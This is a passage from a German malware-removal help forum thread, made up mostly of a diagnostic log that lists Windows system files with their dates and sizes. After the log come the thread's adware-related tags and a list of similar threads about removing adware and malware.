2015-09-19 16:11 - 2010-11-20 05:52 - 00419880 _____ C:\Windows\SysWOW64\locale.nls
2015-09-19 16:11 - 2010-11-20 05:52 - 00419880 _____ C:\Windows\system32\locale.nls
2015-09-19 16:11 - 2010-11-05 03:58 - 00049488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netfxperf.dll
2015-09-19 16:11 - 2009-07-14 03:16 - 00061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tcpmonui.dll
2015-09-19 16:10 - 2010-11-20 15:44 - 01077248 _____ (Microsoft Corporation) C:\Windows\system32\Narrator.exe
2015-09-19 16:10 - 2010-11-20 15:34 - 00363392 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\volmgrx.sys
2015-09-19 16:10 - 2010-11-20 15:34 - 00071552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\volmgr.sys
2015-09-19 16:10 - 2010-11-20 15:34 - 00034688 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storvsc.sys
2015-09-19 16:10 - 2010-11-20 15:33 - 00410496 _____ (Intel Corporation) C:\Windows\system32\Drivers\iaStorV.sys
2015-09-19 16:10 - 2010-11-20 15:33 - 00263040 _____ (Microsoft Corporation) C:\Windows\system32\hal.dll
2015-09-19 16:10 - 2010-11-20 15:33 - 00213888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdyboost.sys
2015-09-19 16:10 - 2010-11-20 15:33 - 00171392 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\scsiport.sys
2015-09-19 16:10 - 2010-11-20 15:33 - 00152960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2015-09-19 16:10 - 2010-11-20 15:33 - 00140672 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msdsm.sys
2015-09-19 16:10 - 2010-11-20 15:33 - 00103808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sbp2port.sys
2015-09-19 16:10 - 2010-11-20 15:33 - 00095616 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2015-09-19 16:10 - 2010-11-20 15:33 - 00094592 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys
2015-09-19 16:10 - 2010-11-20 15:33 - 00078720 _____ (Hewlett-Packard Company) C:\Windows\system32\Drivers\HpSAMD.sys
2015-09-19 16:10 - 2010-11-20 15:33 - 00075136 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\partmgr.sys
2015-09-19 16:10 - 2010-11-20 15:33 - 00063360 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\termdd.sys
2015-09-19 16:10 - 2010-11-20 15:33 - 00052096 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\winhv.sys
2015-09-19 16:10 - 2010-11-20 15:33 - 00031104 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msahci.sys
2015-09-19 16:10 - 2010-11-20 15:33 - 00027520 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Diskdump.sys
2015-09-19 16:10 - 2010-11-20 15:32 - 02217856 _____ (Microsoft Corporation) C:\Windows\system32\bootres.dll
2015-09-19 16:10 - 2010-11-20 15:32 - 00334208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\acpi.sys
2015-09-19 16:10 - 2010-11-20 15:32 - 00179072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Classpnp.sys
2015-09-19 16:10 - 2010-11-20 15:32 - 00155520 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ataport.sys
2015-09-19 16:10 - 2010-11-20 15:32 - 00112000 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2015-09-19 16:10 - 2010-11-20 15:32 - 00027008 _____ (Advanced Micro Devices) C:\Windows\system32\Drivers\amdxata.sys
2015-09-19 16:10 - 2010-11-20 15:28 - 00780008 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2015-09-19 16:10 - 2010-11-20 15:28 - 00223248 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fvevol.sys
2015-09-19 16:10 - 2010-11-20 15:28 - 00166784 _____ (Microsoft Corporation) C:\Windows\system32\basecsp.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 02851840 _____ (Microsoft Corporation) C:\Windows\system32\themeui.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 02250752 _____ (Microsoft Corporation) C:\Windows\system32\SensorsCpl.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 02193920 _____ (Microsoft Corporation) C:\Windows\system32\themecpl.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 01689600 _____ (Microsoft Corporation) C:\Windows\system32\netcenter.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 01363968 _____ (Microsoft Corporation) C:\Windows\system32\wdc.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 01160192 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ENC.DLL
2015-09-19 16:10 - 2010-11-20 15:27 - 01120768 _____ (Microsoft Corporation) C:\Windows\system32\sdengin2.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 01031680 _____ (Microsoft Corporation) C:\Windows\system32\rdpcore.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00933376 _____ (Microsoft Corporation) C:\Windows\system32\SmiEngine.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00812032 _____ (Microsoft Corporation) C:\Windows\system32\wpccpl.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00799744 _____ (Microsoft Corporation) C:\Windows\system32\msftedit.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00691200 _____ (Microsoft Corporation) C:\Windows\system32\VAN.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00658432 _____ (Microsoft Corporation) C:\Windows\system32\PerfCenterCPL.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00633344 _____ (Microsoft Corporation) C:\Windows\system32\riched20.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00625664 _____ (Microsoft Corporation) C:\Windows\system32\usercpl.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00624128 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00611840 _____ (Microsoft Corporation) C:\Windows\system32\wpd_ci.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00568832 _____ (Microsoft Corporation) C:\Windows\system32\scrptadm.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00509952 _____ (Microsoft Corporation) C:\Windows\system32\ntshrui.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00486400 _____ (Microsoft Corporation) C:\Windows\system32\powercpl.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00483840 _____ (Microsoft Corporation) C:\Windows\system32\StructuredQuery.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00475136 _____ (Microsoft Corporation) C:\Windows\system32\wlangpui.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00462336 _____ (Microsoft Corporation) C:\Windows\system32\wiadefui.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\nshipsec.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00429568 _____ (Microsoft Corporation) C:\Windows\system32\puiobj.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00418816 _____ (Microsoft Corporation) C:\Windows\system32\sppwinob.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00416256 _____ (Microsoft Corporation) C:\Windows\system32\prnfldr.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00414208 _____ (Microsoft Corporation) C:\Windows\system32\wlanui.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00406016 _____ (Microsoft Corporation) C:\Windows\system32\scesrv.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00403968 _____ (Microsoft Corporation) C:\Windows\system32\untfs.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00372736 _____ (Microsoft Corporation) C:\Windows\system32\mtxclu.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00367104 _____ (Microsoft Corporation) C:\Windows\system32\wcncsvc.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00366080 _____ (Microsoft Corporation) C:\Windows\system32\zipfldr.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00357888 _____ (Microsoft Corporation) C:\Windows\system32\sharemediacpl.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00344064 _____ (Microsoft Corporation) C:\Windows\system32\rasmans.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\srchadmin.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00335360 _____ (Microsoft Corporation) C:\Windows\system32\msieftp.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\tapisrv.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00300032 _____ (Microsoft Corporation) C:\Windows\system32\pdh.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00290304 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00268288 _____ (Microsoft Corporation) C:\Windows\system32\MSAC3ENC.DLL
2015-09-19 16:10 - 2010-11-20 15:27 - 00264192 _____ (Microsoft Corporation) C:\Windows\system32\upnp.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\onex.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00232960 _____ (Microsoft Corporation) C:\Windows\system32\scecli.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00232448 _____ (Microsoft Corporation) C:\Windows\system32\sppcomapi.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00225280 _____ (Microsoft Corporation) C:\Windows\system32\SndVolSSO.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\wmpsrcwp.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00222720 _____ (Microsoft Corporation) C:\Windows\system32\wwanconn.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\netiohlp.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00214016 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00211456 _____ (Microsoft Corporation) C:\Windows\system32\rasppp.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00196608 _____ (Microsoft Corporation) C:\Windows\system32\shdocvw.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00188928 _____ (Microsoft Corporation) C:\Windows\system32\netjoin.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\provsvc.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00161792 _____ (Microsoft Corporation) C:\Windows\system32\ocsetapi.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00156160 _____ (Microsoft Corporation) C:\Windows\system32\prntvpt.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00149504 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00148992 _____ (Microsoft Corporation) C:\Windows\system32\t2embed.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\shsetup.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00118784 _____ (Microsoft Corporation) C:\Windows\system32\wkssvc.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00117248 _____ (Microsoft Corporation) C:\Windows\system32\wpdbusenum.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00115200 _____ (Microsoft Corporation) C:\Windows\system32\WPDShServiceObj.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\thumbcache.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\QUTIL.DLL
2015-09-19 16:10 - 2010-11-20 15:27 - 00095232 _____ (Microsoft Corporation) C:\Windows\system32\regapi.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00092672 _____ (Microsoft Corporation) C:\Windows\system32\TabSvc.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\nci.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00078848 _____ (Microsoft Corporation) C:\Windows\system32\WUDFSvc.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00070656 _____ (Microsoft Corporation) C:\Windows\system32\nlaapi.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00067584 _____ (Microsoft Corporation) C:\Windows\system32\samcli.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\RpcRtRemote.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\wscapi.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\rtutils.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00046592 _____ (Microsoft Corporation) C:\Windows\system32\msasn1.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00040960 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbGDCoInstaller.dll
2015-09-19 16:10 - 2010-11-20 15:27 - 00038912 _____ (Microsoft Corporation) C:\Windows\system32\vpnikeapi.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 01457664 _____ (Microsoft Corporation) C:\Windows\system32\DxpTaskSync.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\DiagCpl.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 01066496 _____ (Microsoft Corporation) C:\Windows\system32\Display.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00861184 _____ (Microsoft Corporation) C:\Windows\system32\fontext.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00675328 _____ (Microsoft Corporation) C:\Windows\system32\DXPTaskRingtone.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00459776 _____ (Microsoft Corporation) C:\Windows\system32\DXP.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00445952 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00355328 _____ (Microsoft Corporation) C:\Windows\system32\Faultrep.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00348160 _____ (Microsoft Corporation) C:\Windows\system32\eapp3hst.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00332288 _____ (Microsoft Corporation) C:\Windows\system32\hgcpl.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00303616 _____ (Microsoft Corporation) C:\Windows\system32\eapphost.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00279552 _____ (Microsoft Corporation) C:\Windows\system32\dxdiagn.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00239616 _____ (Microsoft Corporation) C:\Windows\system32\dskquoui.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00233984 _____ (Microsoft Corporation) C:\Windows\system32\defaultlocationcpl.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00232448 _____ (Microsoft Corporation) C:\Windows\system32\ListSvc.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\mprapi.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00217088 _____ (Microsoft Corporation) C:\Windows\system32\iasrad.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00211456 _____ (Microsoft Corporation) C:\Windows\system32\mprddm.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00186880 _____ (Microsoft Corporation) C:\Windows\system32\logoncli.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00162816 _____ (Microsoft Corporation) C:\Windows\system32\dps.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00128512 _____ (Microsoft Corporation) C:\Windows\system32\dwmredir.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00118272 _____ (Microsoft Corporation) C:\Windows\system32\dnscmmc.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00116224 _____ (Windows (R) Codename Longhorn DDK provider) C:\Windows\system32\fms.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\iasacct.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00078848 _____ (Microsoft Corporation) C:\Windows\system32\hbaapi.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00072192 _____ (Microsoft Corporation) C:\Windows\system32\fdeploy.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00069120 _____ (Microsoft Corporation) C:\Windows\system32\dot3cfg.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00057856 _____ (Microsoft Corporation) C:\Windows\system32\licmgr10.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\lsmproxy.dll
2015-09-19 16:10 - 2010-11-20 15:26 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\mimefilt.dll
2015-09-19 16:10 - 2010-11-20 15:25 - 03745792 _____ (Microsoft Corporation) C:\Windows\system32\accessibilitycpl.dll
2015-09-19 16:10 - 2010-11-20 15:25 - 03524608 _____ (Microsoft Corporation) C:\Windows\system32\sppsvc.exe
2015-09-19 16:10 - 2010-11-20 15:25 - 01264640 _____ (Microsoft Corporation) C:\Windows\system32\sdclt.exe
2015-09-19 16:10 - 2010-11-20 15:25 - 00974336 _____ (Microsoft Corporation) C:\Windows\system32\WFS.exe
2015-09-19 16:10 - 2010-11-20 15:25 - 00749568 _____ (Microsoft Corporation) C:\Windows\system32\batmeter.dll
2015-09-19 16:10 - 2010-11-20 15:25 - 00726528 _____ (Microsoft Corporation) C:\Windows\system32\AuxiliaryDisplayCpl.dll
2015-09-19 16:10 - 2010-11-20 15:25 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\comctl32.dll
2015-09-19 16:10 - 2010-11-20 15:25 - 00349696 _____ (Microsoft Corporation) C:\Windows\system32\slui.exe
2015-09-19 16:10 - 2010-11-20 15:25 - 00314368 _____ (Microsoft Corporation) C:\Windows\system32\clusapi.dll
2015-09-19 16:10 - 2010-11-20 15:25 - 00273920 _____ (Microsoft Corporation) C:\Windows\system32\SndVol.exe
2015-09-19 16:10 - 2010-11-20 15:25 - 00257024 _____ (Microsoft Corporation) C:\Windows\system32\taskmgr.exe
2015-09-19 16:10 - 2010-11-20 15:25 - 00207872 _____ (Microsoft Corporation) C:\Windows\system32\cfgmgr32.dll
2015-09-19 16:10 - 2010-11-20 15:25 - 00186368 _____ (Microsoft Corporation) C:\Windows\system32\ocsetup.exe
2015-09-19 16:10 - 2010-11-20 15:25 - 00168448 _____ (Microsoft Corporation) C:\Windows\system32\bcdsrv.dll
2015-09-19 16:10 - 2010-11-20 15:25 - 00158720 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll
2015-09-19 16:10 - 2010-11-20 15:25 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\cabview.dll
2015-09-19 16:10 - 2010-11-20 15:25 - 00128000 _____ (Microsoft) C:\Windows\system32\Robocopy.exe
2015-09-19 16:10 - 2010-11-20 15:25 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\AxInstSv.dll
2015-09-19 16:10 - 2010-11-20 15:25 - 00088576 _____ (Microsoft Corporation) C:\Windows\system32\setupcl.exe
2015-09-19 16:10 - 2010-11-20 15:25 - 00069120 _____ (Microsoft Corporation) C:\Windows\system32\taskhost.exe
2015-09-19 16:10 - 2010-11-20 15:25 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\rdpsign.exe
2015-09-19 16:10 - 2010-11-20 15:25 - 00031744 _____ (Microsoft Corporation) C:\Windows\system32\proquota.exe
2015-09-19 16:10 - 2010-11-20 15:25 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\userinit.exe
2015-09-19 16:10 - 2010-11-20 15:25 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2015-09-19 16:10 - 2010-11-20 15:24 - 01538560 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-09-19 16:10 - 2010-11-20 15:24 - 00957440 _____ (Microsoft Corporation) C:\Windows\system32\mblctr.exe
2015-09-19 16:10 - 2010-11-20 15:24 - 00850944 _____ (Microsoft Corporation) C:\Windows\system32\mmsys.cpl
2015-09-19 16:10 - 2010-11-20 15:24 - 00793088 _____ (Microsoft Corporation) C:\Windows\system32\autoconv.exe
2015-09-19 16:10 - 2010-11-20 15:24 - 00777728 _____ (Microsoft Corporation) C:\Windows\system32\autochk.exe
2015-09-19 16:10 - 2010-11-20 15:24 - 00763904 _____ (Microsoft Corporation) C:\Windows\system32\autofmt.exe
2015-09-19 16:10 - 2010-11-20 15:24 - 00726528 _____ (Microsoft Corporation) C:\Windows\system32\appwiz.cpl
2015-09-19 16:10 - 2010-11-20 15:24 - 00684032 _____ (Microsoft Corporation) C:\Windows\system32\TabletPC.cpl
2015-09-19 16:10 - 2010-11-20 15:24 - 00515584 _____ (Microsoft Corporation) C:\Windows\system32\timedate.cpl
2015-09-19 16:10 - 2010-11-20 15:24 - 00359936 _____ (Microsoft Corporation) C:\Windows\system32\eudcedit.exe
2015-09-19 16:10 - 2010-11-20 15:24 - 00300032 _____ (Microsoft Corporation) C:\Windows\system32\msconfig.exe
2015-09-19 16:10 - 2010-11-20 15:24 - 00267264 _____ (Microsoft Corporation) C:\Windows\system32\FXSCOVER.exe
2015-09-19 16:10 - 2010-11-20 15:24 - 00258560 _____ (Microsoft Corporation) C:\Windows\system32\mpg2splt.ax
2015-09-19 16:10 - 2010-11-20 15:24 - 00250880 _____ (Microsoft Corporation) C:\Windows\system32\ksproxy.ax
2015-09-19 16:10 - 2010-11-20 15:24 - 00217088 _____ (Microsoft Corporation) C:\Windows\system32\wdmaud.drv
2015-09-19 16:10 - 2010-11-20 15:24 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2015-09-19 16:10 - 2010-11-20 15:24 - 00104960 _____ (Microsoft Corporation) C:\Windows\system32\Mpeg2Data.ax
2015-09-19 16:10 - 2010-11-20 15:24 - 00098304 _____ (Microsoft Corporation) C:\Windows\system32\WSTPager.ax
2015-09-19 16:10 - 2010-11-20 14:21 - 02983424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIRibbon.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 02311168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wpdshext.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 02202624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SensorsCpl.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 02157568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\themecpl.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 02146304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SyncCenter.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 01624064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMPEncEn.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 01326592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlanpref.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 01227776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdc.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 01003008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMNetMgr.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 00933376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Vault.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 00850432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sbe.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 00826368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpcore.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 00782336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webservices.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 00778240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sqlsrv32.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 00464896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\scrptadm.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 00458752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSDApi.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 00416768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wiadefui.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 00411648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlangpui.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 00380416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sxs.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 00372224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 00363520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StructuredQuery.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 00352768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\termmgr.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 00352256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmpeffects.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 00346624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\untfs.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 00335872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinSATAPI.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 00328192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shsvcs.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 00307712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\scesrv.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 00305152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\taskcomp.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 00301568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srchadmin.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 00276992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wcncsvc.dll
2015-09-19 16:10 - 2010-11-20 14:21 - 00246272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\scansetting.dll
         
Text Split <---

Antwort

Themen zu Malware-gen, Adware-gen ...usw
computer, converter, defender, explorer, flash player, hijackthis, internet, internet explorer, mobogenie, mobogenie entfernen, photoshop, pup.optional.downloader, pup.optional.mytubetheater, pup.optional.vopackage, registry, required, software, spyhunter, spyhunter entfernen, super, trojaner, win32/adware.convertad.wz.gen, win32/adware.convertad.yy, win32/clientconnect.a, win32/downloadsponsor.c, win32/somoto.q, windows xp



Ähnliche Themen: Malware-gen, Adware-gen ...usw


  1. Adware.Trace malware entfernen
    Anleitungen, FAQs & Links - 06.11.2015 (2)
  2. Check auf Malware/Adware/Spyware etc
    Plagegeister aller Art und deren Bekämpfung - 30.08.2015 (11)
  3. Malware/Adware oder sonst was
    Plagegeister aller Art und deren Bekämpfung - 25.06.2015 (35)
  4. Probleme mit Adware/Malware (sweetpage)
    Plagegeister aller Art und deren Bekämpfung - 11.11.2014 (12)
  5. Unistall-Vo-package (Malware/Virus?) bei Win7 64 bit /Malware-Adware gelöscht -Danke!
    Lob, Kritik und Wünsche - 06.07.2014 (1)
  6. Malware ? Adware ? oder so
    Plagegeister aller Art und deren Bekämpfung - 11.06.2014 (5)
  7. Trojaner gefunden TR/Dldr.Agent.314440 und verschiedene Adwares ADWARE/EoRezo.AF, ADWARE/Adware.Gen7, ADWARE/AgentCV.A.2919
    Log-Analyse und Auswertung - 02.05.2014 (19)
  8. ADWARE.gen2 Malware eingefangen
    Plagegeister aller Art und deren Bekämpfung - 09.04.2014 (3)
  9. ADWARE/InstallCore.Gen7 Malware
    Plagegeister aller Art und deren Bekämpfung - 08.02.2014 (15)
  10. Malware AdWare
    Log-Analyse und Auswertung - 28.01.2014 (5)
  11. Adware und Malware eingefangen
    Log-Analyse und Auswertung - 19.04.2013 (15)
  12. PC von Adware.Agent.ZGen, Adware.ClickPotato, Adware.ShopperReports, Adware.Hotbar, Adwa angegriffen
    Mülltonne - 30.06.2011 (0)
  13. adware, spyware,malware ?
    Diskussionsforum - 18.11.2010 (4)
  14. Anti-Malware findet infizierte Objekte: Backdoor.Bot|Adware.Adparatus|Adware.ResultDns
    Plagegeister aller Art und deren Bekämpfung - 26.08.2010 (7)
  15. 5 mal Malware - u.a. : ADWARE/Adware.Gen, ADSPY/FTat.A.2, TR/Agent.95104, ...
    Log-Analyse und Auswertung - 15.01.2010 (2)
  16. Spy Eraser findet Adware.CWS, Malware - Avira findet HEUR/HTML.Malware
    Log-Analyse und Auswertung - 20.10.2008 (1)
